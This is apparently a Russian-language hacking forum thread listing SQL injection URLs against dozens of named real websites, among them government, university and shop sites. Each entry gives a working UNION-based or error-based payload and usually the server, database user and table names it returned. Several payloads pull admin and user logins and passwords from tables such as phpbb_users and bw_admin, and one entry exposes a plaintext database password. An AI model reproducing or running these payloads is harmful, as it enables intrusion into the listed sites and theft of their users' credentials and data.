http://www.assetrisk.com/about-us/people.php?ID=-34+union+select+1,2,3,4,5,6,7,8+--+
Version: 5.0.51a-community-nt
User: root@localhost
Database: assetrisk

http://www.magelectric.ru/?p=-196+union+all+select+1,2,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),4,5,6, 7+--

version : 5.0.22
user : magelectric@localhost
database : magelectric
os : redhat-linux-gnu

Сайт: http://www.ncgtourism.ca
ТИЦ: 0
PR: 4
Пример запроса: http://www.ncgtourism.ca/index4.php?id=-1+union+select+1,@@version_compile_os--+
version - 4.1.20
user - tourism@localhost
database - toursitedb
os - redhat-linux-gnu

==========================================

Сайт: http://www.onaonline.ru
ТИЦ: 30
PR: 3
Пример запроса: http://www.onaonline.ru/news_box.php?idnews=407'+union+select+1,concat_ws( 0x0b,version(),user(),database(),@@version_compile _os),3,4,5,6,7--+
version - 5.0.26-log
user - onaonline@localhost
database - onaonline
os - pc-linux-gnu

==========================================

Сайт: http://www.gazteplostroi.ru
ТИЦ: 30
PR: 0
Пример запроса: http://www.gazteplostroi.ru/item.php?id=-138'+union+select+1,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),group_concat(0x 0b,table_name),null,null,6,7,now()+from+informatio n_schema.tables--+
version - 5.0.77
user - intertime_gaz@localhost
database - intertime_gaz
os - pc-linux-gnu
tables:

CHARACTER_SETS,
CLIENT_STATISTICS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
INNODB_BUFFER_POOL_CONTENT,
INDEX_STATISTICS,
KEY_COLUMN_USAGE,
PROCESSLIST,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TABLE_STATISTICS,
TRIGGERS,
USER_PRIVILEGES,
USER_STATISTICS,
VIEWS,
INNODB_IO_PATTERN,
gts_about,
gts_articles,
gts_catalog,
gts_catalog_cats,
gts_contacts,
gts_docs,
gts_faq,
gts_faq_cats,
gts_links,
gts_links_cats,
gts_news,
gts_pages,
gts_price,
pm_routelinks,
pm_routelinks_cat

http://theosophytrust.org/tlodocs/articlesRC.php?d=The_Occult_Side_Of_Nature.htm&p=-35+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10--+

version:4.0.27-max-log
user:hermes_db@208.109.138.107

http://www.truthcommission.org/commission.php?lang=en&cid=0+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),4,5--+

version:5.0.77:37614_dbtruthcom
user:37614_truthcom@lnh-www1i.bluehalo.myregisteredsite.com

http://www.finishertriatlon.com/revista/noticias.php?id=-121+union+select+1,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user(),version(),database(),@@version_comp ile_os),1),1),3,4,5&year=2010

www.tamaris.de/home/collection/shoes/l/1/detail/1 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17, 18--9/c/1.html?request=1

http://www.mortarinvestments.eu/vehicle.php?id=-171+union+select+1,2,3,4,concat(user(),version(),d atabase(),@@version_compile_os),6,7,8

http://www.emantravel.com/article.php?id=-77+union+select+concat_ws(0x3a,user(),version(),da tabase(),@@version_compile_os),2

http://www.mtg.es/en/diseno_todostallas.php?enid=-8+union+select+1,2,3,concat_ws(0x3a,user(),version (),database(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41

http://www.norica.es/index.php?opt=2&id=-323+union+select+1,2,3,4,5,concat(user_login,char( 58),user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20+from+test.wp_users+limit+0,1--
+phpinfo
http://www.norica.es/phpinfo.php

www.websiteicons.net/index.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13--&p=icons

www.companycoltd.com/company_coltd.php?company_id=f620555555555 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13--

www.berlin.de/tourismus/unterkunft/pensionen/mirnet/hotel/buchung/anfrage.php3?objektnr=38 union select version(),2,3,4,5,6,7--&p=1&s=de&an=&ab=

для гурманов алкогольной продукции....

http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(c har(58),@@version,user(),database(),@@version_comp ile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38+--

version : 5.0.67-log
user : u93285@10.10.153.168
database : u93285
os : unknown-freebsd6.2

http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(c har(58),login,password),11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38+from+bw_admin--

честно сказать, не знаю, можно-ли назвать это инъекцией или нет, но вот:
http://www.evidenceofhumanity.org/story.php?id=9'
в результате имеем:

[dbserver] => localhost [dbusername] => evidence_admin [dbpassword] => 53889160Cody [dbdatabase] => evidence_evidence [dbProvider] => MySQL

думаю, это самое интересное

http://www.vestidos.ru/pages/catalog.php?cid=-97+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@ @version,user(),database(),@@version_compile_os),7 ,8,9,10,11,12,13,14,15,16,17+--

version : 5.0.24-standard
user : vestidos@localhost
database : db_vestidos
os : pc-linux-gnu

http://www.konqi.com/en/read_article.asp?articleid=-69+union+select+1,password,3,4,5,6,7,8,9,10+from+u ser

ms_access :)

Сайт: http://www.gourmandisedesserts.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.gourmandisedesserts.com/class.php?id=-65+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),group_concat(0x0b ,table_name),null,5,null,null,null,9,10,11,12,null ,14+from+information_schema.tables--+
version - 5.0.67.d7-ourdelta-log
user - gourmandise@72.167.232.226
database - gourmandise
os - unknown-linux-gnu
tables:

CHARACTER_SETS,
CLIENT_STATISTICS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
INNODB_BUFFER_POOL_CONTENT,
INDEX_STATISTICS,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TABLE_STATISTICS,
TRIGGERS,
USER_PRIVILEGES,
USER_STATISTICS,
VIEWS,
classes

==========================================

Сайт: http://www.doors007.ru
ТИЦ: 10
PR: 1
Пример запроса: http://www.doors007.ru/item2.php?id=-252+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),group_concat(0x0 b,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+fro m+information_schema.tables--+
version - 5.0.89-Max-log
user - k0038kze_db@c10-w.ht-systems.ru
database - k0038kze_stroyka
os - unknown-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
doc,
doc_group,
docs_mode,
doors007_links,
faq,
folder,
folder_optional_parameters,
fo

==========================================

Сайт: http://www.mosadharavkook.com
ТИЦ: ?
PR: 2
Пример запроса: http://www.mosadharavkook.com/store/item2.php?id=-408+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+
version - 4.1.22-standard
user - mravkook_yoni@localhost
database - mravkook_catalog
os - pc-linux-gnu

==========================================

Сайт: http://www.northcitymarine.com.au
ТИЦ: 0
PR: 0
Пример запроса: http://www.northcitymarine.com.au/item2.php?id=-15+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,ver sion(),user(),database(),@@version_compile_os),10, 11,12,13,14,15,null,17--+
version - 4.0.27-standard
user - ZR12600_ncmmain@204.14.110.100
database - ZR12600_ncmsite
os - pc-linux-gnu

5.0.90-community
http://chaithanya.org/php/readmore.php?id=-5+union+select+1,version(),group_concat(0x0b,colum n_name),4,5,6,7,8,9+from+information_schema.column s+where+table_name=0x757365726C6F67696E+--
table: userlogin::userid,username,userpassword,usertype,u serstatus

and
http://chaithanya.org/php/readmore.php?id=-5+union+select+1,2,group_concat(0x0b,username,0x3a ,userpassword),4,5,6,7,8,9+from+userlogin+--

пр2

http://davigames.com/games.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--

пр2 тиц10
http://gsm-sprut.com/n.php?nid=-1+union+select+1,2,3,4,5,6--

http://www.hdmi.hr/stc2007/index.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database(),@@version_compile_os),6,7,8,9,10,1 1,12,13+from+admin--

http://www.oceanmore.hr/knjiga.php?id_knjiga=-62+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8

Сайт: http://www.netcurtainsdirect.com
ТИЦ: 10
PR: 2
Примеры запросов: http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,concat_ws(0x0b,version(),user( ),database(),@@version_compile_os),3,group_concat( 0x0b,table_name),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88+from+information_schema.tables--+

http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,2,3,group_concat(0x0b,column_n ame),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71 ,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,8 8+from+information_schema.columns+where+table_name ='phpbb_users'--+
version - 5.0.67
user - netcurtains@localhost
database - netcurtainsdirect_com_-_cnets
os - redhat-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
accessories,
bargains,
cafe,
cart,
customers,
customers_optimal,
defaults,
delivery,
deyron,
email_list,
faq,
howhear,
inspiration,
invoice,
linedvoile_panels,
nets,
optimal_errors,
orderlines,
orderlines_opt,
orders,
orders_opt,
orders_web,
other,
payments,
product_options,
products,
products2,
strings,
tablecloths,
test_customers,
test_orderlines,
test_orders,
test_payments,
testimonials,
tiebacks,
typedesc,
typedesc_old,
voile,
voilecurtains,
voilepanels,
phpbb_auth_access,
phpbb_banlist,
phpbb_categories,
phpbb_config,
phpbb_confirm,
phpbb_disallow,
phpbb_forum_prune,
phpbb_forums,
phpbb_groups,
phpbb_posts,
phpbb_posts_text,
phpbb_privmsgs,
phpbb_privmsgs_text,
phpbb_ranks,
phpbb_search_results,
phpbb_search_wordlist,
phpbb_search_wordmatch,
phpbb_sessio

ЦЕНТР СТРАТЕГІЧНИХ ІНІЦІАТИВ

http://www.csi.km.ua/news.php?page=1&new=-43+union+select+1,2,3,4,concat(table_schema,char(5 8),table_name),6,7,8,9,10,11+from+information_sche ma.columns--

http://www.princesscruises.com.do/destinos/index.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(us er,char(58),pass),1),1)+from+admin

http://sips.inesc-id.pt/projects.php?id=-15+union+select+1,version(),user(),database(),@@ve rsion_compile_os,6,7,8,9,10,11,12-- (PR-5)

http://www.universal.pt/main.php?id=-69+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60+from+_tusers+limit+0,1-- [PR-5]

Сайт: http://www.retromoderndesign.com
ТИЦ: 10
PR: 3
Пример запроса: http://www.retromoderndesign.com/sold.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),4,5,group_concat (0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21+from+information_schema.tables--+
version - 5.0.90-log
user - d1479@194.236.32.155
database - d1479
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
retromoderndesign_artikel,
retromoderndesign_artikel_betyg,
retromoderndesign_conversi cm

==========================================


Сайт: http://www.malloves.com
ТИЦ: 0
PR: 3
Примеры запросов: http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),3, group_concat(0x0b,username,0x3a,password),5,6,7,8, 9,10,11,12+from+go_users--+

http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),3, group_concat(0x0b,email),5,6,7,8,9,10,11,12+from+g o_email_list--+
version - 5.0.77
user - malloves@localhost
database - malloves
os - redhat-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
CoverPhotos,
Inventory,
Materials,
go_access_levels,
go_content,
go_content_types,
go_current_special_categorys,
go_current_special_categorys2,
go_current_special_categorys3,
go_current_specials,
go_current_specials2,
go_current_specials3,
go_email_list,
go_email_list_status,
go_misc,
go_modules,
go_online_inquiries,
go_press,
go_press_categories,
go_press_categories_join,
go_testimonials,
go_users

==========================================

Сайт: http://www.pony1997.com
ТИЦ: 0
PR: 2
Пример запроса: http://www.pony1997.com/item2.php?id=4&tbl=catitems2&stl=cast((SELECT+version()||chr(58)||current_user| |chr(58)||current_database())+as+int)--
version - PostgreSQL 8.1.4 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
user - gt108043
database - gt108043
os - i386-portbld-freebsd6.1

==========================================

Сайт: http://www.listentoaudioproshop.com
ТИЦ: 0
PR: 0
Пример запроса: http://www.listentoaudioproshop.com/item3.php?id=53+union+select+1,concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os),3,4, 5,6,7,8,9,group_concat(0x0b,username,0x3a,password )+from+proshop_login--+
version - 5.0.67
user - tookd_kwan@localhost
database - tookd_kwan
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
proshop_category,
proshop_detail,
proshop_filter,
proshop_filteritem,
proshop_headitem,
proshop_login

==========================================

Сайт: http://www.concretorecs.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.concretorecs.com/store/item3.php?id=-2789+union+select+1,2,3,4,5,6,concat_ws(0x0b,versi on(),user(),database(),@@version_compile_os),8,9--+
version - 4.1.22-standard-log
user - concreto_concret@localhost
database - concreto_concreto
os - pc-linux-gnu

==========================================

Сайт: http://www.newsnetwork-bd.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.newsnetwork-bd.com/UI/Public/Common.php?ID=1+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(m id(concat_ws(0x0b,version(),user(),database(),@@ve rsion_compile_os),+1,+70),+floor(rand(0)*2)))--+
version - 4.1.22-max-log
user - newsnet1@68.178.254.199
database - newsnet1
os - unknown-linux-gnu

http://www.festivaltv.ru/bratina/honor/index.php?id=-16+union+select+1,2,version()+--+
version: 5.0.45
filepriv=no;

http://rascunho.iol.pt/pagina.php?id=-5+union+select+1,concat_ws(user(),version(),databa se(),@@version_compile_os),3,4,5,6

PR=6

http://en.fondsk.ru/article.php?id=-2845+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30--

User: u32888@10.10.10.224
Version: 5.0.67-log
Database: u32888

Google PR: 4

Pr 4

http://www.panlarchile2010.cl/espanol/pagina.php?id=-1+union+select+1,2,3,4,5,email,7,8,9,10,11,12,13,1 4+from+clientes+--+

Pr 5

http://www.taan.org.np/article1.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,Password,Name,12+from+tblAdmin


http://www.diariodemadryn.com/pagina.php?ID=-1+union+select+1,2,3,4,email,6,nombre,pass,9,10+fr om+lectores

Pr 5

http://www.copernico.ch/deutsch/pagina.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10

Version :4.1.22
User : copernico@localhost
Server :Apache/2.2.6 (Unix) PHP/5.2.10

Сайт: http://www.danceforfun.at
ТИЦ: 0
PR: 3
Пример запроса: http://www.danceforfun.at/common.php?id=-3+union+select+concat_ws(0x0b,version(),user(),dat abase(),@@version_compile_os)--+
4.0.24_Debian-10sarge1
da000113@www-04.inode.at
da000113_d4f
pc-linux-gnu

============================================

Сайт: http://sports.njau.edu.cn
ТИЦ: 0
PR: 5
Примеры запросов: http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),5,6--+

http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,group_concat(0x0b,table_name) ,5,6+from+information_schema.tables--+
version - 5.1.25-rc-community
user - root@localhost
database - sports
os - Win32

.gov

http://www.fppc.ca.gov/index.php?id=500 UNION ALL SELECT %String_Col%--

Host IP: 209.63.210.7
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.10
DB Server: MySQL >=5
Current DB: webdb_dbo

http://prescott-az.gov/services/parks/parks/index.php?id=24 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25--

Host IP: 63.229.103.73
Web Server: Apache
DB Server: MySQL >=4.1
Current DB: recreation

http://www.algol.com.ua/continents/countries/cities/places_t.php?ID=-1%20UNION%20SELECt%20concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29--+&CID=3&PID=1&PCID=1&PPID=&PPCID=2

PR:4
User: algolco_algol@localhost
Database: algolco_algol
Version: 5.0.90-community

http://www.rfidupdate.com/articles/index.php?id=1241 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15--
Host IP: 216.97.224.21
Web Server: Apache/1.3.41 (Unix) mod_fastcgi/2.4.6 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: rfidup2_rfidupdate


http://www.dsi-keyboards.com/keyboard/item.php?id=110 AND %True_Expression%
Host IP: 205.178.145.6
Web Server: Apache/2.2.8 (Unix) FrontPage/5.0.2.2635
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: dsi_image

хакИр :p :o :rolleyes: :cool:

http://www.magfloat.com/telas/pagina.php?id=26 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7--
Host IP: 201.76.59.10
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL >=5
Current DB: magfloat

http://www.jhortscib.com/show_abs.php?newid=1067+and+2=1+union+select+1,2,3 ,4,version(),6,7,8,9%23
pr6
5.0.51a-community-log

http://www.convice.ru/lev/3/2/id/-8+union+select+null,null,version(),null,null,null, null,null,null

PostgreSQL 8.0.7 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518

http://www.eliteshina.ru/tyreinfo.php?id=-598+union+select+version();--

PostgreSQL 8.2.3 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20061011 (Red Hat 4.1.1-30) (вывод в title)

http://farm.x-price.ru/subscriber.php?id=-1839+union+select+null,null,null,null,null,null,ve rsion();--+

PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

http://www.protok.ru/price2.php3?idgr=-2+and+1=2+union+select+concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os)+--

version : 4.0.27-standart
user : protok@localhost
database : db_protok
os : pc-linux-gnu

www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--

http://www.sbi.org.br/padrao.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,versio n(),database(),user()),7,8,9--

http://www.xtremewarrior.com/post_comment.php?id=-1999+union+select+1,2,unhex(hex(concat_ws(0x3a,adm in_name,admin_pwd,%20admin_id))),4,5,6+from+admin--

Сайт: http://www.vtmit.vt.edu
ТИЦ: 0
PR: 4
Пример запроса: http://www.vtmit.vt.edu/academics/module.php?id=-7+union+select+1,concat(version(),0x0b,user(),0x0b ,database(),0x0b,@@version_compile_os,0x0b),null,g roup_concat(0x0b,table_name)+from+information_sche ma.tables--+
version - 5.0.77
user - iddl@thnad
database - iddl
os - redhat-linux-gnu

============================================

Сайт: http://www.som.si
ТИЦ: 0
PR: 2
Примеры запросов: http://www.som.si/shop_item.php?id=-6153+union+select+1,2,3,concat_ws(0x0b,version(),u ser(),database(),@@version_compile_os),5,group_con cat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22+from+information_schema.tables--+

http://www.som.si/shop_item.php?id=-6153+union+select+1,2,3,concat_ws(0x0b,version(),u ser(),database(),@@version_compile_os),5,group_con cat(0x0b,user_id,0x3a,username,0x3a,password,0x3a, email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2+from+phorum_users--+
version - 5.1.41-3ubuntu12
user - somsi@plesk2.gigaspark.com
database - somsi
os - debian-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
artikli,
artikli_davek,
artikli_material,
artikli_skupine,
artikli_znamke,
kapitalci,
kategorije_tekmovanj,
kje_loviti,
komentarji,
kulinarika,
kupci_dobavitelji,
kupci_dobavitelji_07,
modules,
naj_zgodba,
naj_zgodba_vote,
newsletter,
oglasi,
payment,
phorum_banlists,
phorum_files,
phorum_forum_group_xref,
phorum_forums,
phorum_groups,
phorum_messages,
phorum_private_messages,
phorum_settings,
phorum_subscribers,
phorum_user_group_xref,
phorum_user_newflags,
phorum_user_permissions,
phorum_users,
phorum_users_address,
povezave,
promet,
promet_07,
promet_faktura,
promet_faktura_07,
shop_cart_items_tmp,
skladisce

============================================

Сайт: http://polnolunie.com
ТИЦ: 0
PR: 1
Примеры запросов:
http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,concat_ws(0x0b,version(),user(),database(),@@ver sion_compile_os),3,group_concat(0x0b,table_name),5 ,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.tables--

http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,group_concat(0x0b,email),3,group_concat(0x0b,use rname,0x3a,pass),5,6,7,8,9,10,11,12,13,14/**/from/**/users--

http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,group_concat(0x0b,user_email),3,group_concat(0x0 b,username,0x3a,user_password),5,6,7,8,9,10,11,12, 13,14/**/from/**/phpbb_users--
version - 5.1.46
user - client@localhost
database - polnolunie
os - portbld-freebsd8.0
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
categories,
cities,
items,
leftmenu,
materials,
news,
order_items,
orders,
phpbb_auth_access,
phpbb_banlist,
phpbb_categories,
phpbb_config,
phpbb_confirm,
phpbb_disallow,
phpbb_forum_prune,
phpbb_forums,
phpbb_groups,
phpbb_posts,
phpbb_posts_text,
phpbb_privmsgs,
phpbb_privmsgs_text,
phpbb_ranks,
phpbb_search_results,
phpbb_search_wordlist,
phpbb_search_wordmatch,
phpbb_sessions,
phpbb_sessions_keys,
phpbb_smilies,
phpbb_themes,
phpbb_themes_name,
phpbb_topics,
phpbb_topics_watch,
phpbb_user_group,
phpbb_users,
phpbb_vote_desc,
phpbb_vote_results,
phpbb_vote_voters,
phpbb_words,
states,
stock,
users,
tblBlack

http://www.lelana.ru/info.php?id=99++union+select+1,version(),3,4,5,6,7 ,8,9,10/*

version: 4.1.21
database: oberonmoscow
user: oberonmoscow@217.199.218.38
PR: 2

http://www.slavneft.ru/press/info.php?id=-99+union+select+1,2,version(),4,5,6,7,8,9--

version: 4.0.23a-log
database: db_slavneft_main
user: slavneft_main@localhost
PR: 5

http://www.slavneft.ru/press/info.php?id=-99+union+select+1,2,version(),4,5,6,7,8,9--
боян, сори.

http://www.eurekalert.org/multimedia/pub/22293.php?from=-160331+union+select+version%28%29,2,3--
Version: 4.0.20-max-log
Database: eurekalert
User: nobody@ekaweb05.eurekalert.org

надо бросать курить

http://www.humidor-club.ru/catalog/index.php?dir=show&catid=-76+and+1=2+union+select+1,2,concat_ws(char(58),ver sion(),user(),database(),@@version_compile_os),4,5 ,6,7--&mainid=1&typeid=7

version : 5.0.67-log
user : u29605@10.10.227.201
database : u29605
os : unknown-freebsd6.3

+форум

http://www.sisef.it/forest@/show.php?id=-1+or(1,1)=(select+count(0),concat((select+who+from +userlist+limit+0,1),floor(rand(0)*2))from(informa tion_schema.tables)group+by+2)--

ТИЦ10(R2) PR5 AR1922309

http://www.kar.org.ua/?act=categ&id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELE CT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%2 9x%20GROUP%20BY%20CONCAT%28version%28%29,%20FLOOR% 28RAND%280%29*2%29%29%29%20--

User: kar4500_m1@82.197.131.60
Database: kar4500_m1
Version: 4.1.18-log

http://www.weisskreuz.ru/index.php?cat=-5+union+select+0,concat(0x3a,@@version,user(),data base(),@@version_compile_os),2+--

http://www.michaelpollan.com/article.php?id=-87+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8,9,10--
5.0.81-community
pollan_articles
pollan_article@localhost

http://www.rtos.com/page/product.php?id=-2+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4--
5.0.77-log
expresslogic
expresslogic@216.119.112.190


http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-77+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8,9,10--
5.0.90-community-log
spoono_sections
spoono_db@localhost


http://www.feldgrau.com/main1.php?ID=-7+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4,5,6,7,8,9,10--
5.0.38-Ubuntu_0ubuntu1.4
feldgrau
feldgrau@localhost

http://www.southworth.com/page.php?id=-100+union+select+concat(version(),0x20,database(), 0x20,user())--
4.1.22
southworthbs
swdata@localhost

http://www.choices.edu/resources/detail.php?id=-187+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28--
4.1.22
Choices
choices@impala.services.brown.edu

